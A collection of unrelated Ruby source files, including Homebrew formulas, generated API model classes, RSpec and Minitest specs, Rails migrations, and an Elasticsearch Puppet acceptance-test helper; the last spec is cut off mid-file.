class BoostBuild < Formula
desc "C++ build system"
homepage "https://www.boost.org/build/"
url "https://github.com/boostorg/build/archive/2014.10.tar.gz"
sha256 "d143297d61e7c628fc40c6117d0df41cb40b33845376c331d7574f9a79b72b9f"
head "https://github.com/boostorg/build.git"
bottle do
cellar :any_skip_relocation
sha256 "54e173a7e91aef66bfdb5c497156915518d69dd9a062552ab48e62d443adaa04" => :el_capitan
sha256 "a61eaa58a94a1f236d1dc6e652f7cb57e241e0dd5664bb5cadc258b73ce34887" => :yosemite
sha256 "dd11acd551a6c26f216743eeb938d704f92bc5349c79b5f8e853176e311b7990" => :mavericks
sha256 "03d989cecd3251825466d725f6a00212979b2d41fce344380606b482eaab9b80" => :mountain_lion
end
def install
system "./bootstrap.sh"
system "./b2", "--prefix=#{prefix}", "install"
end
end

# This file was automatically generated for SMASH by SMASH v2.0
# ( https://smashlabs.io ).
module Smash
# UserCustomUpdateModel Model.
class UserCustomUpdateModel < BaseModel
# TODO: Write general description for this method
# @return [String]
attr_accessor :uid
# TODO: Write general description for this method
# @return [String]
attr_accessor :apiuid
# TODO: Write general description for this method
# @return [String]
attr_accessor :avatar
# TODO: Write general description for this method
# @return [String]
attr_accessor :custom_input
# A mapping from model property names to API property names.
def self.names
if @_hash.nil?
@_hash = {}
@_hash['uid'] = 'uid'
@_hash['apiuid'] = 'apiuid'
@_hash['avatar'] = 'avatar'
@_hash['custom_input'] = 'custom-input'
end
@_hash
end
def initialize(uid = nil,
apiuid = nil,
avatar = nil,
custom_input = nil,
additional_properties = {})
@uid = uid
@apiuid = apiuid
@avatar = avatar
@custom_input = custom_input
# Add additional model properties to the instance.
additional_properties.each do |_name, value|
instance_variable_set("@#{_name}", value)
end
end
# Creates an instance of the object from a hash.
def self.from_hash(hash)
return nil unless hash
# Extract variables from the hash.
uid = hash['uid']
apiuid = hash['apiuid']
avatar = hash['avatar']
custom_input = hash['custom-input']
# Clean out expected properties from Hash.
names.each_value { |k| hash.delete(k) }
# Create object from extracted values.
UserCustomUpdateModel.new(uid,
apiuid,
avatar,
custom_input,
hash)
end
end
end
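
# Usage sketch (an assumption for illustration, not part of the generated SDK):
# from_hash maps the API key 'custom-input' onto the custom_input attribute and
# turns any leftover keys into extra instance variables.
payload = {
  'uid' => 'u-1', # hypothetical values
  'apiuid' => 'a-1',
  'avatar' => 'https://example.com/a.png',
  'custom-input' => 'hello'
}
model = Smash::UserCustomUpdateModel.from_hash(payload)
model.custom_input #=> "hello"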

# frozen_string_literal: true
require 'test_helper'
module Archimate
module Svg
module Entity
class ApplicationComponentTest < Minitest::Test
def setup
@model = build_model(
diagrams: [
build_diagram
]
)
@child = @model.diagrams.first.nodes.first
@subject = ApplicationComponent.new(@child, build_bounds)
end
def test_badge
assert_equal "#archimate-app-component-badge", @subject.instance_variable_get(:@badge)
end
end
end
end
end

module ModelCoder
class Constants
ID_FIELD = :token
EXTERNAL_NAMESPACE = 'ModelCoder'
end
end

require 'spec_helper'
include WebMock::API
include Tootsie::API
describe V1 do
include Rack::Test::Methods
def app
V1
end
before :each do
Tootsie::Configuration.instance.update(
aws_access_key_id: "KEY",
aws_secret_access_key: "SECRET",
paths: {
dustin_hoffman: {}
})
end
["/jobs", "/job"].each do |path|
describe "POST #{path}" do
it 'posts job on queue' do
attributes = {
type: 'image',
notification_url: "http://example.com/transcoder_notification",
reference: {'meaning' => 42},
params: {}
}
expect(Configuration.instance.river).to receive(:publish) do |event|
expect(event[:uid]).to match /^tootsie\.job:dustin_hoffman\$/
expect(event[:type]).to eq 'image'
expect(event[:event]).to eq 'tootsie.job'
expect(event[:reference]).to eq({'meaning' => 42})
expect(event[:params]).to eq({})
expect(event[:notification_url]).to eq "http://example.com/transcoder_notification"
end
post '/jobs', JSON.dump(attributes.merge(
path: 'dustin_hoffman'
))
expect(last_response.status).to eq 201
end
it 'accepts job without a path, defaults to "tootsie"' do
attributes = {
type: 'image',
notification_url: "http://example.com/transcoder_notification",
reference: {'meaning' => 42},
params: {}
}
expect(Configuration.instance.river).to receive(:publish) do |event|
expect(event[:uid]).to match /^tootsie\.job:default\$/
end
post '/jobs', JSON.dump(attributes)
expect(last_response.status).to eq 201
end
end
end
end

module Puffer
module OrmAdapter
module Base
def columns_hash
raise ::OrmAdapter::NotSupportedError
end
def reflection name
raise ::OrmAdapter::NotSupportedError
end
def filter scope, fields, options = {}
raise ::OrmAdapter::NotSupportedError
end
def merge_scopes scope, additional
raise ::OrmAdapter::NotSupportedError
end
end
class Reflection < ActiveSupport::OrderedOptions
def initialize hash
super
hash.each { |(key, value)| self[key] = value }
end
end
end
end
OrmAdapter::Base.send :include, Puffer::OrmAdapter::Base

# typed: true
class AddEpicGamesStoreIdToGames < ActiveRecord::Migration[6.0]
def change
add_column :games, :epic_games_store_id, :text, null: true
add_index :games, :epic_games_store_id, unique: true
end
end

require "bundler/setup"
Bundler.require(:default)
require "museums/cli"
require "museums/attraction"
require "museums/scraper"
require 'open-uri'
require 'nokogiri'
require "museums/cli/version"

=begin
#Hydrogen Nucleus API
#The Hydrogen Nucleus API
OpenAPI spec version: 1.9.5
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NucleusApi
class StatisticResourceVO
attr_accessor :description
attr_accessor :parameter
attr_accessor :stat_name
attr_accessor :type
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'description' => :'description',
:'parameter' => :'parameter',
:'stat_name' => :'stat_name',
:'type' => :'type'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'description' => :'String',
:'parameter' => :'String',
:'stat_name' => :'String',
:'type' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'description')
self.description = attributes[:'description']
end
if attributes.has_key?(:'parameter')
self.parameter = attributes[:'parameter']
end
if attributes.has_key?(:'stat_name')
self.stat_name = attributes[:'stat_name']
end
if attributes.has_key?(:'type')
self.type = attributes[:'type']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
description == o.description &&
parameter == o.parameter &&
stat_name == o.stat_name &&
type == o.type
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[description, parameter, stat_name, type].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
(value)
when :Date
(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NucleusApi.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
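
# Usage sketch (an assumption for illustration): populating a model with
# build_from_hash (symbol keys, matching attribute_map) and dumping it back out.
stat = NucleusApi::StatisticResourceVO.new
stat.build_from_hash(description: 'mean', stat_name: 'avg', type: 'double')
stat.to_hash #=> {:description=>"mean", :parameter=>nil, :stat_name=>"avg", :type=>"double"}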

require 'rspec'
require 'rails_helper'
require_relative '../query_lib/06_joins_warmup.rb'
describe "JOIN warmup" do
describe "films_from_sixty_two" do
it "selects films from the year 1962" do
expect(films_from_sixty_two.conform).to contain_exactly(
["121", "To Kill a Mockingbird"],
["479", "Dr. No"],
["1082", "Music Man, The"],
["1496", "What Ever Happened to Baby Jane?"],
["1751", "Cape Fear"]
)
end
end
describe "year_of_kane" do
it "selects the year that Citizen Kane was released" do
expect(year_of_kane.conform).to contain_exactly(["1941"])
end
end
describe "trek_films" do
it "selects all Star Trek films and orders them by year" do
expect(trek_films.conform).to eq([
["402", "Star Trek: The Motion Picture", "1979"],
["209", "Star Trek: The Wrath of Khan", "1982"],
["438", "Star Trek III: The Search for Spock", "1984"],
["349", "Star Trek IV: The Voyage Home", "1986"],
["472", "Star Trek V: The Final Frontier", "1989"],
["410", "Star Trek VI: The Undiscovered Country", "1991"],
["280", "Star Trek: Generations", "1994"],
["68", "Star Trek: First Contact", "1996"],
["252", "Star Trek: Insurrection", "1998"]
])
end
end
describe "films_by_id" do
it "selects the names of the films with the given IDs" do
expect(films_by_id.conform).to contain_exactly(
["Big Momma's House"],
["Power of One, The"],
["To Be or Not to Be"]
)
end
end
describe "glenn_close_id" do
it "selects the ID of actress Glenn Close" do
expect(glenn_close_id.conform).to contain_exactly(["104"])
end
end
describe "casablanca_id" do
it "selects the ID of the film Casablanca" do
expect(casablanca_id.conform).to contain_exactly(["27"])
end
end
describe "casablanca_cast" do
it "selects the cast of the film Casablanca" do
expect(casablanca_cast.conform).to contain_exactly(
["Humphrey Bogart"],
["Ingrid Bergman"],
["Claude Rains"],
["Peter Lorre"],
["Paul Henreid"],
["John Qualen"],
["Curt Bois"],
["Conrad Veidt"],
["Madeleine LeBeau"]
)
end
end
describe "alien_cast" do
it "selects the cast of the film Alien" do
expect(alien_cast.conform).to contain_exactly(
["Sigourney Weaver"],
["Ian Holm"],
["Harry Dean Stanton"],
["Tom Skerritt"],
["John Hurt"],
["Veronica Cartwright"],
["Yaphet Kotto"]
)
end
end
end

class AddDetailToGenres < ActiveRecord::Migration[5.2]
def change
add_column :genres, :name, :string
end
end

require_relative 'test_model'
require_relative 'test_enum'
class TestClassWithAttributes
include Riveter::Attributes
attr_string :string, :default => 'A'
attr_text :text, :default => 'b'
attr_integer :integer, :default => 1
attr_decimal :decimal, :default => 9.998
attr_date :date, :default => Date.new(2010, 1, 12)
attr_date_range :date_range, :default => Date.new(2010, 1, 12)..Date.new(2011, 1, 12)
attr_time :time, :default => Time.new(2010, 1, 12, 14, 56)
attr_boolean :boolean, :default => true
attr_enum :enum, TestEnum, :default => TestEnum::Member1
attr_array :array, :default => [1, 2, 3]
attr_hash :hash, :default => {:a => :b}
attr_object :object, :default => 'whatever'
attr_object :with_lambda_default, :default => lambda { self }
end
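
# Usage sketch (assumptions: Riveter::Attributes provides a no-argument
# constructor and readers that fall back to each declared :default).
instance = TestClassWithAttributes.new
instance.string  #=> "A"
instance.boolean #=> true
instance.enum    #=> TestEnum::Member1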

begin
require 'rcov/rcovtask'
namespace :test do
targets = ['unit', 'functional', 'integration']
namespace :rcov do
desc "Delete aggregate rcov data."
task :clean do
rm_rf "reports/rcov"
mkdir_p "reports/rcov"
end
desc "Open code rcov reports in a browser."
task :show => 'test:rcov' do
targets.each do |t|
system("open reports/rcov/#{t}/index.html")
end
end
targets.each do |target|
desc "Run the #{target} tests using rcov"
Rcov::RcovTask.new(target) do |t|
t.libs << "test"
t.test_files = FileList["test/#{target}/*_test.rb"]
t.verbose = true
t.output_dir = "reports/rcov/#{target}"
t.rcov_opts << '--rails'
t.rcov_opts << '--exclude gems,__sandbox'
t.rcov_opts << '--html'
end
end
end
task :rcov => (['rcov:clean'] + targets.collect{|t| "rcov:#{t}"})
end
desc "run all tests using rcov"
task :rcov => 'test:rcov'
rescue LoadError
puts "Warning: unable to load rcov tasks"
end

ENV['RAILS_ENV'] ||= 'test'
require_relative '../config/environment'
require 'rails/test_help'
class ActiveSupport::TestCase
# Setup all fixtures in test/fixtures/*.yml for all tests in abc order.
fixtures :all
# Add more helper methods to be used by all tests here...
end

require "logger"
require "savon/soap"
module Savon
module Global
# Sets whether to log HTTP requests.
attr_writer :log
# Returns whether to log HTTP requests. Defaults to +true+.
def log?
@log != false
end
# Sets the logger to use.
attr_writer :logger
# Returns the logger. Defaults to an instance of +Logger+ writing to STDOUT.
def logger
@logger ||= ::Logger.new STDOUT
end
# Sets the log level.
attr_writer :log_level
# Returns the log level. Defaults to :debug.
def log_level
@log_level ||= :debug
end
# Logs a given +message+.
def log(message)
logger.send log_level, message if log?
end
# Sets whether to raise HTTP errors and SOAP faults.
attr_writer :raise_errors
# Returns whether to raise errors. Defaults to +true+.
def raise_errors?
@raise_errors != false
end
# Sets the global SOAP version.
def soap_version=(version)
raise ArgumentError, "Invalid SOAP version: #{version}" unless SOAP::Versions.include? version
@version = version
end
# Returns SOAP version. Defaults to +DefaultVersion+.
def soap_version
@version ||= SOAP::DefaultVersion
end
# Returns whether to strip namespaces in a SOAP response Hash.
# Defaults to +true+.
def strip_namespaces?
@strip_namespaces != false
end
# Sets whether to strip namespaces in a SOAP response Hash.
attr_writer :strip_namespaces
# Returns the response pattern to apply.
def response_pattern
@response_pattern ||= []
end
# Sets the response pattern (an Array of Regexps or Symbols).
attr_writer :response_pattern
# Reset to default configuration.
def reset_config!
self.log = true
self.logger = ::Logger.new STDOUT
self.log_level = :debug
self.raise_errors = true
self.soap_version = SOAP::DefaultVersion
self.strip_namespaces = true
self.response_pattern = []
end
end
end
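
# Usage sketch (assumption: as in Savon 0.9.x, this module backs the global
# configuration object yielded by Savon.configure).
Savon.configure do |config|
  config.raise_errors = false # don't raise HTTP errors or SOAP faults
  config.log_level = :info    # defaults to :debug
  config.soap_version = 2     # must be a version listed in SOAP::Versions
end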

class Global < Formula
include Language::Python::Shebang
desc "GNU Global source code tag system, installed with Universal Ctags"
homepage "https://www.gnu.org/software/global/"
url "https://ftp.gnu.org/gnu/global/global-6.6.7.tar.gz"
mirror "https://ftpmirror.gnu.org/global/global-6.6.7.tar.gz"
sha256 "69a0f77f53827c5568176c1d382166df361e74263a047f0b3058aa2f2ad58a3c"
license "GPL-3.0-or-later"
revision 1
bottle do
sha256 arm64_big_sur: "f2481ae1cb5d8077d7ac769ca1cda9c34a6cb8d0e89eeb831a452f3992dab6e0"
sha256 big_sur: "7d48a07430d1c4197c031dbbeb2c9993e3470f67ef1b2148e76f433039cebd4d"
sha256 catalina: "3814876d5cb67f8e914415fd2ff09b7ebf62ce272af19e9e4c03baebfbb3aa02"
sha256 mojave: "cf6c674b4656adca75cfd7d34af6aa48c9c7f9ce9498137babe2f69a71bb429d"
sha256 x86_64_linux: "0c8e848c0df6aff47f4db8d28784ea2384c1d60c304287e142895807aa9f6736"
end
head do
url ":pserver:anonymous:@cvs.savannah.gnu.org:/sources/global", using: :cvs
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "bison" => :build
depends_on "flex" => :build
## gperf is provided by OSX Command Line Tools.
depends_on "libtool" => :build
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "universal-ctags"
depends_on "libtool"
depends_on "ncurses"
depends_on "[email protected]"
depends_on "sqlite"
skip_clean "lib/gtags"
resource "Pygments" do
url "https://files.pythonhosted.org/packages/ba/6e/7a7c13c21d8a4a7f82ccbfe257a045890d4dbf18c023f985f565f97393e3/Pygments-2.9.0.tar.gz"
sha256 "a18f47b506a429f6f4b9df81bb02beab9ca21d0a5fee38ed15aef65f0545519f"
end
# use homebrew sqlite instead of the older copy included in libdb/
# When removing the patch, check whether we can remove the
# autoconf/automake/libtool dependencies
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/bc4dc49c2476c2d4ffecb21bb76699e67cb57415/global/6.6.7-external-sqlite.patch"
sha256 "1b87c9b90a6555cd77c72de933303348e1e148b71a5976d4a0040a3038ef2627"
end
def install
if build.head?
system "sh", "reconf.sh"
else
# Needed for the patch. Check that this can be removed when the patch is not necessary
system "autoreconf", "--force", "--install", "--symlink", "--verbose"
end
ENV.prepend_create_path "PYTHONPATH", libexec/Language::Python.site_packages("python3")
resource("Pygments").stage do
system "python3", *Language::Python.setup_install_args(libexec)
end
args = %W[
--disable-dependency-tracking
--prefix=#{prefix}
--sysconfdir=#{etc}
--with-sqlite3=#{Formula["sqlite"].opt_prefix}
--with-universal-ctags=ctags
]
system "./configure", *args
system "make", "install"
rewrite_shebang detected_python_shebang, share/"gtags/script/pygments_parser.py"
bin.env_script_all_files(libexec/"bin", PYTHONPATH: ENV["PYTHONPATH"])
etc.install "gtags.conf"
# we copy these in already
cd share/"gtags" do
rm %w[README COPYING LICENSE INSTALL ChangeLog AUTHORS]
end
end
test do
(testpath/"test.c").write <<~EOS
int c2func (void) { return 0; }
void cfunc (void) {int cvar = c2func(); }")
EOS
(testpath/"test.py").write <<~EOS
def py2func ():
return 0
def pyfunc ():
pyvar = py2func()
EOS
system bin/"gtags", "--gtagsconf=#{share}/gtags/gtags.conf", "--gtagslabel=pygments"
assert_match "test.c", shell_output("#{bin}/global -d cfunc")
assert_match "test.c", shell_output("#{bin}/global -d c2func")
assert_match "test.c", shell_output("#{bin}/global -r c2func")
assert_match "test.py", shell_output("#{bin}/global -d pyfunc")
assert_match "test.py", shell_output("#{bin}/global -d py2func")
assert_match "test.py", shell_output("#{bin}/global -r py2func")
assert_match "test.c", shell_output("#{bin}/global -s cvar")
assert_match "test.py", shell_output("#{bin}/global -s pyvar")
system bin/"gtags", "--gtagsconf=#{share}/gtags/gtags.conf", "--gtagslabel=universal-ctags"
# ctags only yields definitions
assert_match "test.c", shell_output("#{bin}/global -d cfunc # passes")
assert_match "test.c", shell_output("#{bin}/global -d c2func # passes")
assert_match "test.py", shell_output("#{bin}/global -d pyfunc # passes")
assert_match "test.py", shell_output("#{bin}/global -d py2func # passes")
refute_match "test.c", shell_output("#{bin}/global -r c2func # correctly fails")
refute_match "test.c", shell_output("#{bin}/global -s cvar # correctly fails")
refute_match "test.py", shell_output("#{bin}/global -r py2func # correctly fails")
refute_match "test.py", shell_output("#{bin}/global -s pyvar # correctly fails")
# Test the default parser
system bin/"gtags", "--gtagsconf=#{share}/gtags/gtags.conf", "--gtagslabel=default"
assert_match "test.c", shell_output("#{bin}/global -d cfunc")
assert_match "test.c", shell_output("#{bin}/global -d c2func")
assert_match "test.c", shell_output("#{bin}/global -r c2func")
assert_match "test.c", shell_output("#{bin}/global -s cvar")
# Test tag files in sqlite format
system bin/"gtags", "--gtagsconf=#{share}/gtags/gtags.conf", "--gtagslabel=pygments", "--sqlite3"
assert_match "test.c", shell_output("#{bin}/global -d cfunc")
assert_match "test.c", shell_output("#{bin}/global -d c2func")
assert_match "test.c", shell_output("#{bin}/global -r c2func")
assert_match "test.py", shell_output("#{bin}/global -d pyfunc")
assert_match "test.py", shell_output("#{bin}/global -d py2func")
assert_match "test.py", shell_output("#{bin}/global -r py2func")
assert_match "test.c", shell_output("#{bin}/global -s cvar")
assert_match "test.py", shell_output("#{bin}/global -s pyvar")
end
end

cask "visual-paradigm-ce" do
version "16.3,20211114"
sha256 "3c3757e52e0ffdb04ce31687e3fd6d45b16085bf75dab81d61a6590c7e875293"
url "https://www.visual-paradigm.com/downloads/vpce/Visual_Paradigm_CE_#{version.before_comma.dots_to_underscores}_#{version.after_comma}_OSX_WithJRE.dmg"
name "Visual Paradigm Community Edition"
desc "All-in-one UML, SysML, BPMN Modeling Platform for Agile"
homepage "https://www.visual-paradigm.com/"
livecheck do
url "https://www.visual-paradigm.com/downloads/vpce/checksum.html"
strategy :header_match do |headers|
match = headers["location"].match(%r{/vpce(\d+(?:\.\d+)+)/(\d+)/checksum\.html}i)
next if match.blank?
"#{match[1]},#{match[2]}"
end
end
# Renamed to avoid conflict with visual-paradigm.
app "Visual Paradigm.app", target: "Visual Paradigm CE.app"
end

require_relative 'shared/a_predicate_ast_node'
module Alf
class Predicate
describe Factory, 'not' do
include Factory
subject{ self.not(true) }
it_should_behave_like "a predicate AST node"
it{ should be_a(Not) }
it{ should eql([:not, tautology]) }
end
end
end

# frozen_string_literal: true
require 'securerandom'
require 'rspec/retry'
require 'simp/beaker_helpers'
include Simp::BeakerHelpers # rubocop:disable Style/MixinUsage
require_relative '../../spec_helper_tls'
require_relative '../../spec_utilities'
require_relative '../../../lib/puppet_x/elastic/deep_to_i'
require_relative '../../../lib/puppet_x/elastic/deep_to_s'
# def f
# RSpec.configuration.fact
# end
# FIXME: this value should not be hardcoded
ENV['ELASTICSEARCH_VERSION'] = '7.10.1'
ENV.delete('BEAKER_debug')
run_puppet_install_helper('agent') unless ENV['BEAKER_provision'] == 'no'
RSpec.configure do |c|
# General-purpose spec-global variables
c.add_setting :v, default: {}
# Puppet debug logging
v[:puppet_debug] = ENV['BEAKER_debug'] ? true : false
unless ENV['snapshot_version'].nil?
v[:snapshot_version] = ENV['snapshot_version']
v[:is_snapshot] = ENV['SNAPSHOT_TEST'] == 'true'
end
unless ENV['ELASTICSEARCH_VERSION'].nil? && v[:snapshot_version].nil?
v[:elasticsearch_full_version] = ENV['ELASTICSEARCH_VERSION'] || v[:snapshot_version]
v[:elasticsearch_major_version] = v[:elasticsearch_full_version].split('.').first.to_i
v[:elasticsearch_package] = {}
v[:template] = if v[:elasticsearch_major_version] == 6
JSON.parse(File.read('spec/fixtures/templates/6.x.json'))
elsif v[:elasticsearch_major_version] >= 8
JSON.parse(File.read('spec/fixtures/templates/post_8.0.json'))
else
JSON.parse(File.read('spec/fixtures/templates/7.x.json'))
end
v[:template] = Puppet_X::Elastic.deep_to_i(Puppet_X::Elastic.deep_to_s(v[:template]))
v[:pipeline] = JSON.parse(File.read('spec/fixtures/pipelines/example.json'))
end
v[:elasticsearch_plugins] = Dir[
artifact("*#{v[:elasticsearch_full_version]}.zip", ['plugins'])
].map do |plugin|
plugin_filename = File.basename(plugin)
plugin_name = plugin_filename.match(%r{^(?<name>.+)-#{v[:elasticsearch_full_version]}.zip})[:name]
[
plugin_name,
{
path: plugin,
url: derive_plugin_urls_for(v[:elasticsearch_full_version], [plugin_name]).keys.first,
},
]
end.to_h
v[:oss] = !ENV['OSS_PACKAGE'].nil? and ENV['OSS_PACKAGE'] == 'true'
v[:cluster_name] = SecureRandom.hex(10)
# rspec-retry
c.display_try_failure_messages = true
c.default_sleep_interval = 10
# General-case retry keyword for unstable tests
c.around :each, :with_retries do |example|
example.run_with_retry retry: 10
end
# Helper hook for module cleanup
c.after :context, :with_cleanup do
apply_manifest <<-MANIFEST
class { 'elasticsearch':
ensure => 'absent',
manage_repo => true,
oss => #{v[:oss]},
}
file { '/usr/share/elasticsearch/plugin':
ensure => 'absent',
force => true,
recurse => true,
require => Class['elasticsearch'],
}
MANIFEST
end
c.before :context, :with_certificates do
@keystore_password = SecureRandom.hex
@role = [*('a'..'z')].sample(8).join
# Setup TLS cert placement
@tls = gen_certs(2, '/tmp')
create_remote_file hosts, @tls[:ca][:cert][:path], @tls[:ca][:cert][:pem]
@tls[:clients].each do |node|
node.each do |_type, params|
create_remote_file hosts, params[:path], params[:pem]
end
end
end
c.before :context, :with_license do
Vault.address = ENV['VAULT_ADDR']
if ENV['CI']
Vault.auth.approle(ENV['VAULT_APPROLE_ROLE_ID'], ENV['VAULT_APPROLE_SECRET_ID'])
else
Vault.auth.token(ENV['VAULT_TOKEN'])
end
licenses = Vault.with_retries(Vault::HTTPConnectionError) do
Vault.logical.read(ENV['VAULT_PATH'])
end.data
raise 'No license found!' unless licenses
# license = case v[:elasticsearch_major_version]
# when 6
# licenses[:v5]
# else
# licenses[:v7]
# end
license = licenses[:v7]
create_remote_file hosts, '/tmp/license.json', license
v[:elasticsearch_license_path] = '/tmp/license.json'
end
c.after :context, :then_purge do
shell 'rm -rf {/usr/share,/etc,/var/lib}/elasticsearch*'
end
c.before :context, :first_purge do
shell 'rm -rf {/usr/share,/etc,/var/lib}/elasticsearch*'
end
# Provide a hook filter to spit out some ES logs if the example fails.
c.after(:example, :logs_on_failure) do |example|
if example.exception
hosts.each do |host|
on host, "find / -name '#{v[:cluster_name]}.log' | xargs cat || true" do |result|
puts result.formatted_output
end
end
end
end
end
files_dir = ENV['files_dir'] || './spec/fixtures/artifacts'
# General bootstrapping steps for each host
hosts.each do |host|
# # Set the host to 'aio' in order to adopt the puppet-agent style of
# # installation, and configure paths/etc.
# host[:type] = 'aio'
# configure_defaults_on host, 'aio'
if fact('os.family') == 'Suse'
install_package host,
'--force-resolution augeas-devel libxml2-devel ruby-devel'
on host, 'gem install ruby-augeas --no-ri --no-rdoc'
end
v[:ext] = case fact('os.family')
when 'Debian'
'deb'
else
'rpm'
end
v[:elasticsearch_package]&.merge!(
derive_full_package_url(
v[:elasticsearch_full_version], [v[:ext]]
).flat_map do |url, filename|
[[:url, url], [:filename, filename], [:path, artifact(filename)]]
end.to_h
)
end
RSpec.configure do |c|
if v[:is_snapshot]
c.before :suite do
scp_to default,
"#{files_dir}/elasticsearch-snapshot.#{v[:ext]}",
"/tmp/elasticsearch-snapshot.#{v[:ext]}"
v[:snapshot_package] = "file:/tmp/elasticsearch-snapshot.#{v[:ext]}"
end
end
c.before :suite do
fetch_archives(derive_artifact_urls_for(ENV['ELASTICSEARCH_VERSION']))
# Use the Java class once before the suite of tests
unless shell('command -v java', accept_all_exit_codes: true).exit_code.zero?
java = case fact('os.name')
when 'OpenSuSE'
'package => "java-1_8_0-openjdk-headless",'
else
''
end
apply_manifest <<-MANIFEST
class { "java" :
distribution => "jdk",
#{java}
}
MANIFEST
end
end
end
# # Java 8 is only easy to manage on recent distros
# def v5x_capable?
# (fact('os.family') == 'RedHat' and \
# not (fact('os.name') == 'OracleLinux' and \
# f['os']['release']['major'] == '6')) or \
# f.dig 'os', 'distro', 'codename' == 'xenial'
# end

# frozen_string_literal: true
require 'rugged'
require 'tmpdir'
require 'logger'
require 'yaml'
require 'time'
lib_dir = __dir__
$LOAD_PATH << lib_dir
require 'miq_flow/pluggable/provider_docker'
require 'miq_flow/pluggable/provider_local'
require 'miq_flow/pluggable/provider_noop'
require 'miq_flow/pluggable/method_partial'
require 'miq_flow/pluggable/method_clean'
require 'miq_flow/error'
require 'miq_flow/mixin_miq'
require 'miq_flow/mixin_git'
require 'miq_flow/mixin_api'
require 'miq_flow/mixin_settings'
require 'miq_flow/mixin_config'
require 'miq_flow/manageiq'
require 'miq_flow/domain'
require 'miq_flow/feature'
require 'miq_flow/miqflow'
require 'miq_flow/cli'
require 'miq_flow/version'
$settings = {}
$settings[:miq] = {}
$settings[:git] = {}
MiqFlow::Config.set_defaults()

class Compose2kube < Formula
desc "Convert docker-compose service files to Kubernetes objects"
homepage "https://github.com/kelseyhightower/compose2kube"
url "https://github.com/kelseyhightower/compose2kube/archive/0.0.2.tar.gz"
sha256 "d09b86994949f883c5aa4d041a12f6c5a8989f3755a2fb49a2abac2ad5380c30"
revision 1
head "https://github.com/kelseyhightower/compose2kube.git"
bottle do
cellar :any_skip_relocation
sha256 "ebc7d22f93d1b4032f3d4975b23734e0e2bc1539c91e3f2100778c406f5cdddf" => :mojave
sha256 "f657b3850b4f6fa2f941ed7de472ca0908f9ac3aefe3ab8502aac14753369135" => :high_sierra
sha256 "1d2cb6b785c7cc7b06a5bcaf0a39fda3ad66548b2ff09fbd23bdf293f1c1ebf0" => :sierra
sha256 "90b2466bb93be95570354475aa1cadf5b35af8944f84abfa612cea4d210d6b67" => :el_capitan
sha256 "210e6242a05505b20208e03d278c272c1d90e54b747908119400ed018636d2a6" => :yosemite
sha256 "160761c839574530f9248dc722cef07132a1535ea94b50f83a2c0aded1771c67" => :x86_64_linux # glibc 2.19
end
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/kelseyhightower/compose2kube").install buildpath.children
cd "src/github.com/kelseyhightower/compose2kube" do
system "go", "build", "-o", bin/"compose2kube"
prefix.install_metafiles
end
end
test do
assert_match version.to_s, shell_output("#{bin}/compose2kube -h 2>&1", 2)
end
end

require 'spec_helper'
module Codebreaker
describe Game do
context "#start" do
let(:game) {Game.new "User"}
let(:secret_code) {game.instance_variable_get(:@secret_code)}
before do
game.start
end
it "generates secret code" do
expect(secret_code).not_to be_empty
end
it "saves 4 number secret code" do
expect(secret_code).to have(4).items
end
it "save secret code with nurbers from 1 to 6" do
expect(secret_code).to match(/[1-6]+/)
end
end
